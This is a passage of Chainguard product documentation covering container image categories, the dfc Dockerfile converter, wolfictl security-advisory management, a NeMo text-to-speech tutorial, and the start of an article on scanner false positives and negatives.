Chainguard Console. After logging in you will be able to find all the currently available Starter Containers in the Public images tab. 
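Pulling from an organization's repository, as described above, assumes your local Docker client is already authenticated to Chainguard's registry. A minimal sketch of that flow, using an example.com placeholder for the organization name, looks like this:

```sh
# Log in to the Chainguard platform, configure a Docker credential helper for
# cgr.dev, then pull an image from your organization's repository.
chainctl auth login
chainctl auth configure-docker
docker pull cgr.dev/example.com/chainguard-base:latest
```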
Production Containers The rest of Chainguard Containers, those that are not Starter images and not included in the free tier of images, are referred to as Production Containers. Production images are enterprise-ready images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness and unique time-stamped tags. Unlike Starter images, which are typically paired with only the latest version of an upstream package, Production images offer specific major and minor versions of open source software. As with the Starter Container category, any container image considered a Production image will also fall into at least one of the other categories listed in this guide. To view the Production container images that your organization has access to, select the appropriate organization in the drop-down menu above the left-hand navigation and then click the Organization images tab. Base Containers Base Containers are meant to be extended by users with their own packages and applications. Examples include chainguard-base, Go, and Python. Chainguard is responsible for releasing fully-patched toolchains and Base Containers, while customers are responsible for patching any applications and dependencies they add to a Chainguard Container. It is recommended to use a fully-patched Chainguard toolchain image to build the application, and a fully-patched Chainguard Base container image to layer the final application on. When migrating to a Chainguard Base container image, you should first check the image’s overview page on the Containers Directory for usage details and any compatibility notes. You should understand the libraries, runtime requirements, and operating system dependencies of the applications you plan to have running on the Base container image. It is a best practice to use the same versions of any languages or applications that will be running on the Chainguard Base container image as what is currently running in your environment. Do not upgrade language or application versions at the same time that you migrate. Following the migration, you should thoroughly test and monitor your application. If you need a package to use with your Chainguard Base Container, Wolfi packages are available using apk. Ensure you only use Wolfi packages, as Alpine APKs are not compatible with Wolfi. Additionally, it is important to note that vendor-provided packages need to be glibc-based and their functionality should be fully tested along with the application. For additional tips, please refer to our guide on Troubleshooting apko Builds. Note: Base Containers often require more customization by the user. Be aware that Chainguard offers a customization platform called Custom Assembly to streamline this requirement without customers having to stand up their own custom pipelines. Application Containers In contrast with Base container images, which are intended to be built upon, Application Containers are designed to be used directly, often by plugging into systems like Helm. Some examples of Chainguard’s Application images include nginx, Fulcio, and apko. When it comes to maintaining Application container images, Chainguard is responsible for rebuilding the upstream project with the latest toolchain and patching static and dynamic dependencies where such a change is non-breaking. Customers are responsible for tracking a supported version of the Chainguard Container. 
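To illustrate the "use directly" model, an Application container such as nginx can typically be run without building anything on top of it. The following is a hedged sketch: the organization name is a placeholder, and the listening port shown (8080) reflects the common convention for images that run as a non-root user and may differ for your image and version.

```sh
# Run the nginx Application container directly, mapping a local port to the
# container's non-privileged listening port (assumed to be 8080 here).
docker run --rm -p 8080:8080 cgr.dev/$ORGANIZATION/nginx:latest
```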
When migrating to a Chainguard Application container image, you should first check the image’s overview page on the Containers Directory for usage details and any compatibility notes. There may be user ID, permissions, or volume path differences with the Chainguard image that you should be aware of. It is a best practice to use the same version of the Chainguard Application container image as what is currently running in your environment. AI Containers Artificial intelligence and machine learning (AI/ML) systems are used in a wide variety of high-stakes applications, including information retrieval, medical research, fraud identification, military operations, autonomous vehicle navigation, and more. If compromised by malicious actors, the consequences could be disastrous and far-reaching. Due to their unique features and uses, these systems often pose a greater risk than traditional software systems. Chainguard offers a suite of CPU- and GPU-enabled AI Containers which can help to mitigate these risks. Some of these AI container images include NeMo, PyTorch, and TensorFlow. These images are hardened, minimal, and optimized for efficient AI development and deployment. By leveraging Chainguard AI Containers, organizations can confidently secure their AI infrastructure, streamline vulnerability management, and maintain high performance with low-to-zero vulnerabilities. Rather than starting with tens, dozens, or hundreds of CVEs in your application or pipeline, you start with a clean slate. To learn more about Chainguard’s AI Containers and their uses, we encourage you to check out our course on Securing the AI/ML Supply Chain. FIPS Containers FIPS — or Federal Information Processing Standards — are publicly announced standards developed by the National Institute of Standards and Technology (NIST). Chainguard offers images that use FIPS-validated cryptographic software modules to help users ensure that their applications meet FIPS standards. Chainguard offers FIPS versions of many of its container images, so FIPS Containers will fall into more than one category. Some Chainguard container images with FIPS variants are nginx, PHP, and PyTorch. For more information, please refer to our conceptual article on FIPS Chainguard Containers. Container Image Type Considerations There is some overlap between the different container image categories outlined in this guide. For example, the PyTorch image is an AI image, but it is also part of our free tier, meaning it’s also a Starter image. Many customers purchase both Application and Base Containers. Note that it often takes more time to migrate your applications to a Base container image in comparison to an Application image due to the complexity of coordinating multiple teams, testing, and release schedules. We recommend starting with and migrating to Application container images first while your teams get trained and onboarded with Base container images. A common requirement for many customers is to add a company-specific certificate or other security-related content. The three most common ways to accomplish this are: Using incert Running the update-ca-certificates utility within a Dockerfile Using the Java keytool utility within a Dockerfile The process of adding or updating certificates, configuring APK repositories, and implementing other organization-specific customizations into an image is commonly known as creating a “Golden Image”. 
This approach enables these standard modifications to be applied once and then distributed across all teams, thereby reducing the risk of errors and minimizing friction during the migration process. Learn More By reading this guide, you should have a better understanding of how Chainguard categorizes its container images and what these categories mean. To recap: Starter: Chainguard’s free tier of container images Base: Containers meant to be built upon Application: Containers meant to be run directly FIPS: Contain FIPS-validated cryptographic modules AI: Containers for running AI/ML workloads securely For more information on Chainguard Containers, please refer to the other resources in the About section. In particular, you may find our conceptual article on Chainguard’s Shared Responsibility Model to be of interest. --- ### Dockerfile Converter URL: https://edu.chainguard.dev/chainguard/migration/dockerfile-conversion/ Last Modified: April 30, 2025 Tags: Chainguard Containers, Product, Open Source Chainguard’s Dockerfile Converter (dfc) was designed to facilitate the process of porting existing Dockerfiles to use Chainguard Containers. The following platforms are currently supported: Alpine (apk) Debian / Ubuntu (apt, apt-get) Fedora / RedHat / UBI (yum, dnf, microdnf) For each FROM line in the Dockerfile, dfc attempts to replace the base image with an equivalent Chainguard Container. For each RUN line in the Dockerfile, dfc attempts to detect the use of a known package manager (e.g. apt / yum / apk) and extracts the names of any packages being installed. It then attempts to map these packages to equivalent Chainguard APKs. Additionally, dfc will add a USER root instruction to allow package installations, since most Chainguard Containers run as a regular, non-root user. You can find more details about dfc’s mapping process on their GitHub repository, in the How it Works section of their README. Note: dfc is an open source tool that is still under active development and subject to changes. While we try to cover a variety of use case scenarios, some inconsistencies may occur due to the diverse nature of Dockerfiles and package manager instructions. There may be errors or gaps in functionality as you use the feature in the early access phase. Please let us know if you come across any issues or have any questions. You can file an issue on GitHub to get in touch. Installation You’ll need a Go environment to install and run dfc. To install it on your local system, run: go install github.com/chainguard-dev/dfc@latest To verify that the installation was successful, run: dfc --help You will receive output with basic usage instructions. Usage: dfc [flags] Examples: dfc <path_to_dockerfile> Flags: -h, --help help for dfc -i, --in-place modified the Dockerfile in place (vs. stdout), saving original in a .bak file --json print dockerfile as json (pre-conversion) --org string the root repo namespace at cgr.dev/<org> (default "ORGANIZATION") Basic Usage Unless specified, dfc will not make any direct changes to your Dockerfile, writing the results to the default output stream. Run the following to convert a Dockerfile and save the output to a new file: dfc ./Dockerfile > ./Dockerfile.converted You can also pipe the Dockerfile’s contents from stdin: cat ./Dockerfile | dfc - The following CLI flags are available: --org=<org> - the registry namespace, i.e. cgr.dev/<org> (default placeholder: ORGANIZATION) --json - serialize Dockerfile as JSON --in-place / -i - modify the Dockerfile in place vs. 
printing to stdout, saving original in a .bak file Examples This section has a few practical examples you can use as reference. Setting the ORG By default, dfc uses ORGANIZATION as a placeholder for the image registry address. You can provide the --org parameter to specify the organization that you’re a member of. To use free tier images, use chainguard as the organization. Consider the following Dockerfile for a CLI PHP application: FROM php:8.2-cli RUN apt-get update && apt-get install -y \ git \ curl \ libxml2-dev \ zip \ unzip # Install Composer and set up application COPY --from=composer:latest /usr/bin/composer /usr/bin/composer RUN mkdir /application COPY . /application/ RUN cd /application && composer install ENTRYPOINT [ "php", "/application/minicli" ] The following command will convert this Dockerfile to use Chainguard Containers, using the chainguard organization for the free tier images. The output will be redirected to a new file called Dockerfile.new: dfc Dockerfile > Dockerfile.new --org chainguard The modified file will now use cgr.dev/chainguard/php:latest-dev as the base image: FROM cgr.dev/chainguard/php:latest-dev USER root RUN apk add -U curl git libxml2-dev unzip zip # Install Composer and set up application COPY --from=composer:latest /usr/bin/composer /usr/bin/composer RUN mkdir /application COPY . /application/ RUN cd /application && composer install ENTRYPOINT [ "php", "/application/minicli" ] Inline Usage With inline usage, you can convert single instructions or entire Dockerfiles. For example, to convert a single FROM line, you can run: echo "FROM node" | dfc --org chainguard.edu - This will give you the following result: FROM cgr.dev/chainguard.edu/node:latest-dev You can also convert single RUN directives such as the following: echo "RUN apt-get update && apt-get install -y nano" | dfc - Which will give you the following output: RUN apk add -U nano It is also possible to convert a whole Dockerfile using inline mode. Here we use a heredoc input stream to create the Dockerfile contents: cat <<DOCKERFILE | dfc --org chainguard.edu - FROM node RUN apt-get update && apt-get install -y nano DOCKERFILE This will convert to: FROM cgr.dev/chainguard.edu/node:latest-dev USER root RUN apk add -U nano Making In Place Changes By default, dfc will print the converted Dockerfile to stdout, and won’t make any changes to your original Dockerfile. You can use the --in-place flag to make dfc overwrite the original file. This will also create a .bak file to back up the original file contents. dfc Dockerfile --in-place 2025/03/14 14:54:21 saving dockerfile backup to Dockerfile.bak 2025/03/14 14:54:21 overwriting Dockerfile This method does not work with inline input. Working with JSON Output If you plan on using dfc programmatically, the JSON output can come in handy. For example, the following will convert an inline Dockerfile and output the results in JSON format, parsed by jq for readability: cat <<DOCKERFILE | dfc --org chainguard.edu --json - | jq FROM node RUN apt-get update && apt-get install -y nano DOCKERFILE { "lines": [ { "raw": "FROM node", "converted": "FROM cgr.dev/chainguard.edu/node:latest-dev\nUSER root", "stage": 1, "from": { "base": "node" } }, { "raw": "RUN apt-get update && apt-get install -y nano", "converted": "RUN apk add -U nano", "stage": 1, "run": { "distro": "debian", "manager": "apt-get", "packages": [ "nano" ] } }, { "raw": "" } ] } Check also the Useful jq formulas section from the dfc repository as reference on how to use jq to filter the JSON output. 
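For instance, since each entry in the JSON output carries both the original line and its conversion, you can reassemble just the converted Dockerfile text with jq. This is a small sketch that relies only on the lines[].converted and lines[].raw fields shown above:

```sh
# Convert an inline Dockerfile and print the converted text, falling back to
# the raw line for entries that needed no conversion.
cat <<DOCKERFILE | dfc --org chainguard.edu --json - | jq -r '.lines[] | .converted // .raw'
FROM node
RUN apt-get update && apt-get install -y nano
DOCKERFILE
```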
Using dfc as a Go Library You can import the package github.com/chainguard-dev/dfc/pkg/dfc and use it directly from Go code to parse and convert Dockerfiles on your own, without the dfc CLI. This way, you can integrate dfc into your own Go applications or scripts, which can be especially useful if you have a large number of Dockerfiles to convert or if you want to further customize the output produced by dfc. Check the Using from Go section on the dfc repository for examples on how to use it as a Go library. Learn More If you’d like to learn more about our Dockerfile Converter, including how to get involved with the project, you can check out the dfc repository on GitHub. We welcome contributions and feedback from the community. --- ### Using wolfictl to Manage Security Advisories URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/security-advisories/managing-advisories/ Last Modified: August 9, 2024 Tags: Product, Chainguard Containers, CVE Note: This document is deprecated as of June 2025. Chainguard operates its own Security Advisories page to alert users about the status of vulnerabilities found in Chainguard Containers. To maintain this database, we use wolfictl, a tool developed for working with the Wolfi un-distro. In this guide, you will walk through using wolfictl to create an advisory for a vulnerable package. You’ll also learn how to update this advisory as more information about the vulnerability is disclosed over time. To follow along, you will need to have git and the Go programming language installed on your machine. This guide will focus on the packages and advisories issued for Wolfi. How to Install wolfictl To work with security advisories, you will need to install the wolfictl tool onto your machine. First, execute the following command in your terminal to clone the wolfictl repository locally, and navigate to it. git clone git@github.com:wolfi-dev/wolfictl.git wolfictl && cd $_ Then, using go, install the wolfictl tool: go install If you encounter any errors during installation, your installed version of go may be out of date. You can check what version of go you have installed by running go version in your terminal. Check the go.mod file in the wolfictl repository to determine what version of go you will need, and be sure to update go to this version or a later release to continue. Alternatively, you may need to add the wolfictl binary to your $PATH after installation if your system does not recognize the command. You can verify that you have successfully installed wolfictl by executing the wolfictl version command in your terminal. wolfictl version A successful installation of wolfictl will display output similar to the following. Note that the exact output will vary over time as new wolfictl versions are released. __ __ ___ _ _____ ___ ____ _____ _ \ \ / / / _ \ | | | ___| |_ _| / ___| |_ _| | | \ \ /\ / / | | | | | | | |_ | | | | | | | | \ V V / | |_| | | |___ | _| | | | |___ | | | |___ \_/\_/ \___/ |_____| |_| |___| \____| |_| |_____| wolfictl: A CLI helper for developing Wolfi GitVersion: devel GitCommit: 6c98dc69a559192575d085d87fd916d8281dd67d GitTreeState: clean BuildDate: 2024-07-23T01:57:17 GoVersion: go1.22.5 Compiler: gc Platform: darwin/arm64 In the next section, you will complete your local setup so you can begin using the wolfictl tool to work with advisories. 
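If your shell cannot find the wolfictl command after running go install, the binary most likely landed in Go's install directory, which is not always on your PATH. A minimal fix, assuming a default Go setup, is:

```sh
# Add Go's binary install directory to the PATH for the current shell session,
# then confirm that the wolfictl binary is found.
export PATH="$(go env GOPATH)/bin:$PATH"
wolfictl version
```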
Cloning Package and Advisory Repositories Before you can interact with security advisories, the wolfictl tool will need access to existing Wolfi package and advisory information. You will need to clone two additional repositories: the wolfi-dev/os repository and the wolfi-dev/advisories repository. Execute the following commands to clone each of these repositories to your machine and then navigate to the advisories directory. git clone git@github.com:wolfi-dev/os.git git clone git@github.com:wolfi-dev/advisories.git && cd advisories With wolfictl installed and these two repositories cloned locally, you are now ready to interact with the security advisory database. Viewing Existing Advisories First we will take a look at the existing advisories issued for packages in Wolfi. Keep in mind that the results shown here, and on your own machine, are snapshots in time. You should regularly check for changes to the upstream repository as new packages and advisories are issued. You will be using the wolfictl advisory list command to view existing advisories. There are a variety of flags which you can append to assist in your search. -p lists all advisories for a given package name. -V lists all advisories for a given CVE ID, across all packages. -t lists all advisories by their most recent event type. -c lists all advisories by detected component type. --history reports the full list of events for displayed advisories. You can combine multiple flags together to conduct a more granular search. For a complete listing of available command options, you can run the wolfictl advisory list -h command in your terminal. For example, let’s say you want to find advisories for the glibc package as well as the full history of these advisories. wolfictl advisory list -p glibc --history The following shows a small sample of output from this command at the time of this writing. Note that the output of this command may change as vulnerability entries are added and updated over time. glibc CGA-49g3-q5cv-7m6g (CVE-2023-4527, GHSA-hmf7-f8gf-8f4p) 2023-09-22T14:14:01Z fixed (2.38-r2) CGA-573p-mg38-75fh (CVE-2019-1010024, GHSA-3q29-89cr-qgvj) 2023-03-06T13:22:06Z false positive (vulnerability-record-analysis-contested) CGA-57wh-hj4x-5342 (CVE-2023-4911, GHSA-m77w-6vjw-wh2f) 2023-10-03T22:58:32Z fixed (2.38-r5) CGA-5vfg-gqch-hcj5 (CVE-2010-4756, GHSA-x2r9-jfjp-jvp9) 2023-03-06T17:47:28Z false positive (vulnerability-record-analysis-contested) 2024-07-26T16:49:42Z fixed (2.40-r0) CGA-7fr2-v9gg-pg28 (CVE-2024-33600, GHSA-jv3g-6pg3-v9j8) 2024-05-14T11:00:51Z detected (glibc) 2024-05-15T04:40:16Z fixed (2.39-r5) … From this snapshot, you can get an idea of the timeline of a vulnerability’s remediation process. For example, CVE-2024-33600 was detected on May 14th, 2024, and was remediated within the next 24 hours. Similar results are shown for other advisories, including the versions of the package in which the vulnerability was remediated. We encourage you to experiment with these flags to find what information you can gather from your various searches. Creating and Updating Advisories To begin creating and updating security advisories, you will need to navigate back to the Wolfi package repository you cloned. cd ../os Here, you will run the wolfictl advisory create command to begin the process of adding a new advisory. This command will respond with a few prompts in the terminal requesting input of information used to create the advisory. First, you will be asked to enter the package in which the CVE was found. 
For this demonstration we will use the glibc package. Then, you will be asked for the vulnerability ID that you wish to make an advisory for. This ID must be a CVE, CGA, GHSA, or Go vulnerability ID. Finally, you will be asked what the status for the advisory should be, from one of the following options: detection (Under investigation) true-positive-determination (Affected) fixed (Fixed) false-positive-determination (Not affected) fix-not-planned (Fix not planned) pending-upstream-fix (Pending upstream fix) To learn more about the meanings of each of these identifiers, please refer to our documentation on event types. The following shows an example of the wolfictl advisory create command in action. Please note that the vulnerability referenced is an arbitrary CVE ID for demonstration purposes and does not reflect an actual vulnerability found in the glibc package. Auto-detected distro: Wolfi Package: glibc Vulnerability: CVE-2024-57230 Type: detection You can now check that your advisory has been successfully added with the wolfictl advisory diff command, as follows: wolfictl advisory diff From this command, you can see the local addition of your new advisory for the glibc package. Auto-detected distro: Wolfi ( - removed / ~ modified / + added ) ~ document "glibc" + advisory "CGA-pwm8-5rj4-phww" Let’s say that you upgrade a vulnerable package to a newer, patched version. You are now ready to update the security advisory so its status is now “Fixed”. You can do so using the wolfictl advisory update command. Again, this command will walk you through the steps of updating an advisory by requesting information about the advisory you wish to modify. The following shows an example of this workflow in action. Auto-detected distro: Wolfi Package: glibc Vulnerability: CVE-2024-57230 Type: fixed Fixed Version: 2.39-r7 The same process can be followed for other status updates, whether you wish to mark a vulnerability as “Not affected” in the case of a false positive finding, “Fix not planned”, or another applicable status. Further Reading In this guide, you learned how to use the wolfictl tool to interact with Chainguard’s Security Advisories feed. You used wolfictl to explore existing advisories, and also created and updated a new security advisory. The steps shown in this guide allowed you to make local changes to your advisory feed. If you wish to contribute to the open-source Wolfi OS advisory feed, please read through our How To Patch CVEs guide and our How Chainguard Issues Security Advisories article first. Be sure to routinely check our Security Advisories page when your scanners pick up new CVEs in your images. If you want to learn more about how you can interpret a security advisory and what its status means for your security, read our article on using advisories. --- ### Getting Started with the NeMo Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/nemo/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product NeMo is a deep learning framework for building conversational AI models that provides standalone module collections for Automatic Speech Recognition (ASR), Natural Language Processing (NLP), and Text-to-Speech (TTS) tasks. The NeMo Chainguard Container is a comparatively lightweight NeMo environment with low to no CVEs, making it ideal for both training and production inference. 
The NeMo Chainguard Container is designed to work with the CUDA 12 parallel computing platform, and is suited to workloads that take advantage of connected GPUs. What is Deep Learning? Deep learning is a subset of machine learning that leverages a flexible computational architecture, the neural network, to address a wide variety of tasks. Neural networks emulate the structure of the brain and consist of interconnected nodes (neurons) that each contain an associated weight and threshold. In concert with an activation function, these values determine whether data is propagated within the network, producing an output layer corresponding to a classification, regression, or other result. By technical convention, a deep neural network (DNN) has at least three layers: an input layer, an output layer, and one or more hidden layers. In practice, DNNs often have many layers. Deep neural networks underpin many common computational tasks in modern applications, such as speech to text and generative AI. In this getting started guide, we will use the NeMo Chainguard Container to generate speech from plain text using models provided by NeMo’s text-to-speech (TTS) and natural language processing (NLP) collections. In doing so, we’ll compare the security and footprint of the NeMo Chainguard Container to the official runtime container image and consider further approaches and resources for applying the NeMo Chainguard Container to additional tasks in conversational AI. This guide is primarily designed for use in an environment with access to one or more NVIDIA GPUs. However, NeMo is built on PyTorch Lightning, which supports a wide variety of accelerators, or interfaces to categories of processing units (CPU, GPU, TPU) or high-level clustering mechanisms such as Distributed Data Parallel. Some consideration will be given to alternative computing environments such as CPU in this tutorial. Note: In November 2024, after this article was first written, Chainguard made changes to its free tier of container images. In order to access the non-free container images used in this guide, you will need to be part of an organization that has access to them. For a full list of container images that will remain in Chainguard's free tier, please refer to this support page. Prerequisites If Docker Engine (or Docker Desktop) is not already installed, follow the instructions for installing Docker Engine on your host machine. To take advantage of connected GPUs, you’ll need to install CUDA Toolkit on your host machine. Installing CUDA Toolkit Compute Unified Device Architecture (CUDA) is a parallel computing platform developed by NVIDIA. To take advantage of connected GPUs, you’ll need to follow the setup instructions for your local machine or create a CUDA-enabled instance on a cloud provider. To set up CUDA on your local machine, follow the installation instructions for Linux or Windows. CUDA is not currently supported on Mac OS. Google Cloud Platform provides CUDA-ready deep learning instances, including PyTorch-specific instructions. Amazon Web Services also provides CUDA-ready deep learning instances. This tutorial can be followed without connected GPUs or CUDA Toolkit. To run commands in this tutorial on CPU, omit the --gpus all flag when executing container commands. Keep in mind that some functionality within NeMo (such as training models) will take significantly longer on CPU. 
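Before moving on, you can also confirm that the host itself can see its GPUs. This is a quick sanity check that assumes the NVIDIA driver is already installed on the host; it is not needed for CPU-only runs.

```sh
# List the GPUs visible to the host. If this fails, revisit the CUDA Toolkit
# and driver installation steps above before running the container with --gpus all.
nvidia-smi
```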
Testing Access to GPUs We’ll start by running the NeMo Chainguard Container interactively and determining whether the environment has access to connected GPUs. Use the following command to pull the container image, run it with GPU access, and start an interactive shell inside the running container. docker run -it --rm \ --gpus all \ --shm-size=8g \ --ulimit memlock=-1 \ --ulimit stack=67108864 \ cgr.dev/$ORGANIZATION/nemo:latest Note: Be aware that you will need to change $ORGANIZATION to reflect the name of your organization’s repository within Chainguard’s registry. These options allow access to all available GPUs, allocate a custom amount of shared memory (8 GB) to the container, and adjust the locked-memory and stack size limits. Running this command for the first time may take a few minutes, since it will download the NeMo Chainguard Container to your host machine. Once the image is pulled and the command runs successfully, you will be interacting with a bash shell in the running container. Enter the following commands at the prompt to check the availability of your GPU. $ python Python 3.11.9 (main, May 1 2024, 21:48:03) [GCC 13.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from nemo.core import pytorch_lightning >>> len(pytorch_lightning.accelerators.find_usable_cuda_devices()) 1 The above output shows that one GPU is connected and available. Since PyTorch is also accessible within our NeMo Chainguard Container, you can also use it to access more granular information on CUDA and attached GPUs. >>> import torch >>> torch.cuda.is_available() True >>> torch.cuda.get_device_name(0) 'Tesla V100-SXM2-16GB' Once you’ve determined that your environment has access to CUDA and connected GPUs, exit the Python interpreter by typing Control-d or by typing exit() and pressing Enter, then exit the container’s shell to return to the prompt of your host machine. NeMo Overview NeMo is a generative AI toolkit and framework with a focus on conversational AI tasks such as NLP, ASR, and TTS, as well as large language models (LLM) and multimodal (MM) models. NeMo uses a system of neural modules, an abstraction over a variety of common elements in model training and inference such as encoders, decoders, loss functions, layers, or models. NeMo also provides collections of modules targeting specific areas of concern in conversational and generative AI, such as LLMs, speech AI / NLP, and TTS. NeMo is built on PyTorch Lightning, a high-level interface to PyTorch with a focus on scalability, and uses the Hydra library for configuration management. Since NeMo is a framework with many collections of modules suitable for a wide variety of projects, we’ve chosen an example task, generative text to speech, requiring the use of two TTS modules. This is an appropriate example of a task that might be run as part of a larger production application. 
Text to Speech (TTS) Example In this section, we’ll run a script that uses the NeMo Chainguard Container to: Start with a message in plain text Transform it into a set of phonemes Generate a spectrogram (waveform representation) using a NeMo-provided spectrogram model Transform the spectrogram values into audio using a NeMo-provided vocoder (human voice) model Write the resulting audio to a .wav file at a set rate First, let’s create a folder to work in on your host machine: mkdir -p ~/nemo-tts && cd ~/nemo-tts Next, let’s download our tts.py script: curl https://raw.githubusercontent.com/chainguard-dev/nemo-examples/main/tts.py > tts.py You should now be in a working directory containing only one file, tts.py. We’ll be mounting this folder in our container as a volume, which will allow us to both pass in our script and extract our output. We’ll now start a container based on our NeMo Chainguard Container, mount the current working directory containing our tts.py script inside the container as a volume, and run the script in the container: docker run -it --rm \ --gpus all \ --user root \ --shm-size=8g \ --ulimit memlock=-1 \ --ulimit stack=67108864 \ -v $PWD:/home/nonroot/nemo-test \ cgr.dev/$ORGANIZATION/nemo:latest \ "/home/nonroot/nemo-test/tts.py" Note that we ran the above script as root. This allows us to share the script and output .wav file between the host and container. Remember not to run your container image as root in a production environment. If your host machine does not have attached GPUs and you’d like to run the above on your CPU, omit the --gpus all \ line. The script tests for availability of the CUDA platform and sets the accelerator to CPU if CUDA is not detected, so the script will also function on CPU. Since we’re using pretrained models to perform text to speech, this example will only take a few minutes using a CPU only. However, other tasks such as model training and finetuning may take significantly longer without connected GPUs. Note that NeMo collections are large, and initial imports can take up to a minute depending on your environment. The script may appear to hang during that time. After imports are complete, you should see a large amount of output as NeMo pulls models and works through the steps in the script (tokenizing, generating a spectrogram, generating audio, and writing audio to disk). On completion, the script outputs a test.wav file. Because we mounted a volume, this file should now be present in the working directory of your host machine. ls test.wav tts.py The test.wav file should contain audio similar to this output: Output from the TTS script Final Considerations and Next Steps This section will consider next steps for applying the NeMo Chainguard Container to other tasks in conversational AI. In the tts.py script run above, we used two models provided by NeMo, both contained within the TTS collection. Tacotron2 speech synthesis model HiFi-GAN speech synthesis model The former model allows us to convert plain text into a spectrogram, or a representation of a waveform. The second model generates audio from the spectrogram. Note that NVIDIA’s model overview pages provide useful background information, tags, and sample code. You can search the full NGC model catalog to find pretrained models for use with NeMo. In this script, we used pretrained models to create the phonemes and audio output. These models can be finetuned with your own speech data to customize the results. NVIDIA hosts a tutorial on finetuning TTS models with NeMo. 
The following resources may give a starting point for further explorations with the NeMo Chainguard Container: NVIDIA provides a wide variety of NeMo Tutorials that are a strong entry point for working with the framework to accomplish specific tasks. NVIDIA’s NeMo Playbooks provide a basis for more advanced tasks and configurations and address running workloads on different platforms and orchestration tooling. The NeMo Collections organizes reference documentation for NeMo collections and modules. The NVIDIA NGC model catalog can be searched to find models suitable for specific tasks, and each model’s overview page provides a useful reference with sample code. This NVIDIA Conversational AI publications page collects papers that use the NeMo framework, showcasing cutting-edge generative deep learning using NeMo --- ### False Positives and False Negatives with Container Images Scanners URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/working-with-scanners/false-results/ Last Modified: September 14, 2023 Tags: CVE, Overview, Conceptual A vulnerability scanner is a tool that analyzes your software components and reports any CVEs it finds. Using a vulnerability scanner to find CVEs that impact your system is a critical step in software vulnerability remediation, but as you begin to triage scanner-reported vulnerabilities, you may find that your scanner’s results are not perfectly accurate. The goal of a vulnerability scanner is to identify the vulnerabilities that impact your container images, which can be considered true positive vulnerabilities. Sometimes, a scanner surfaces CVEs which are not actually impacting your images, which are called false positive vulnerabilities. Your scanner may even miss some vulnerabilities that are impacting you, termed false negative vulnerabilities. The presence of false positive and negative vulnerabilities can add a tricky layer to the vulnerability remediation process. False positive vulnerabilities can be “noisy” and distract you from remediating the vulnerabilities that are actively impacting your containers. Additionally, false negative vulnerabilities can silently affect you, making them a hidden threat to your container image security. This article aims to explain the formation of false positive and false negative vulnerabilities, allowing you to better understand what they mean, how they impact you, and how you can use tools to fine-tune your scanner to improve the accuracy of your scan results. How False Positives and False Negatives Occur Understanding how false positives and negatives occur first requires insight into how scanners operate. A vulnerability scanner starts by ingesting various vulnerability databases. A vulnerability database (such as the National Vulnerability Database) is home to information regarding causes, impacts, and security advisories for software vulnerabilities. A container image scanner will often use multiple vulnerability databases as references for what software components may be vulnerable. Different databases may focus on documenting vulnerabilities for certain software vendors or products. As a result, collecting vulnerability data from numerous sources allows a scanner to identify a more exhaustive selection of vulnerabilities across software components. When you conduct a vulnerability scan on your container images, the scanner attempts to detect what packages comprise the image. 
It does so by sifting through the images’ source code and files introduced by package managers in search of open source software components. If successful, the scanner collects key metadata (such as package names and versions) that can be referred to later. It will then compare this metadata with the various databases it references in an attempt to determine if any packages in the software are affected by vulnerabilities. Due to the complexity of cross-referencing image components against databases, scanners are not infallible. Sometimes vulnerabilities are misidentified — or even missed entirely. There are multiple ways in which this can occur throughout the scanning process from start to finish. Scanner-level Issues Vulnerability scanners may be unable to consistently detect container components, causing the results of scans to be incomplete or inaccurate. Scanners often rely on package managers and package metadata to catalog the parts of a container. If a scanner cannot collect complete information about package metadata, the results of the scan may not reflect the true contents of the image. For example, if a package in a container is not tracked by a package manager, it may go undetected, so vulnerabilities contained within are not reported. For an in-depth discussion of how scanners fail to collect certain information, we encourage you to check out our blog post on “Software Dark Matter”. Program Scope Some reported vulnerabilities may be false positives because they are detected outside of the scope of your container images. For example, a container may have packages in it which have vulnerabilities, though the specific vulnerable functions may not be called or reachable by your images. As a result, these vulnerabilities may pop up in your scans despite your program not interacting with their vulnerable sources. It is worth noting that these false positive vulnerabilities could impact you if other vulnerabilities are leveraged to access them, so they are not negligible. However, such situations arise infrequently, since they depend on other vulnerabilities being exploited first. Missing or Mismatched Information Inconsistencies in package versioning conventions may cause scanners to fail in detecting the correct versions of your software components. Software vendors choose different version naming schemes for their products, so scanners may not easily detect what package versions are in use. Alternatively, missing or inconsistent data on vulnerable package versions in vulnerability databases can have a similar effect. In both cases, your scanner may struggle to correlate the package version in your container to package versions in vulnerability records, producing false positives and negatives where components are mismatched. SCA vs SAST Tools Software Composition Analysis (SCA) tools focus on the detection and assessment of open source software components, making them ideal for container image scans. SCA tools cross-reference package metadata with vulnerability databases to determine if vulnerabilities are present. However, in situations where SCA tools cannot match a package to its entries in a vulnerability database, false negatives can occur. Static Application Security Testing (SAST) tools scan your proprietary software to search for vulnerabilities. They provide guidance on how to modify code to resolve a given vulnerability. 
However, SAST tools lack context surrounding the software’s behavior at runtime, giving an incomplete analysis of how the software may function. Without a comprehensive view of the software’s anatomy and use, many false positive vulnerabilities occur in SAST scans. To learn how to choose the right scanner method for your application, check out this comparison of SCA and SAST scanning tools. Impacts of False Positives and False Negatives False positive vulnerabilities are red herrings: They look important, but take you away from the vulnerabilities which truly matter. Identifying what vulnerabilities are true and false positives can be difficult, as your false positive results are mixed in with the true positive findings. When dealing with hundreds of vulnerabilities, the costs of extensive triage and remediation [PDF] can add up fast. False negative vulnerabilities can have major impacts on a system if they are not discovered. They are a goldmine for attackers if they find them before you do. The successful exploitation of a false negative vulnerability can result in a zero-day attack. A zero-day attack occurs when an adversary exploits a vulnerability in software which the maintainer is unaware of. This can cause the attack to go unnoticed or unresolved until the vulnerability is discovered. Many infamous CVEs, such as Log4Shell, are examples of incredibly impactful zero-day vulnerabilities. The presence of false positive and negative vulnerabilities in your scans adds another unnecessary layer of complexity to the remediation process. Having an unreliable scanner can increase the amount of time you spend filtering out false positive results, giving you less time to focus on the true positives affecting you. Additionally, an inconsistent scanner reduces your confidence in the completeness and accuracy of your scans, making it difficult to determine if false negatives are lurking among your containers. Reducing False Results Unfortunately, there is no single way to stop false positives and false negatives from occurring in your vulnerability scans. Triaging reported vulnerabilities will always be necessary to determine what vulnerabilities need to be addressed based on their severity. However, steps can be taken to reduce the overall number of false positive and negative results that surface. SBOMs, Purls, and VEX An SBOM, or 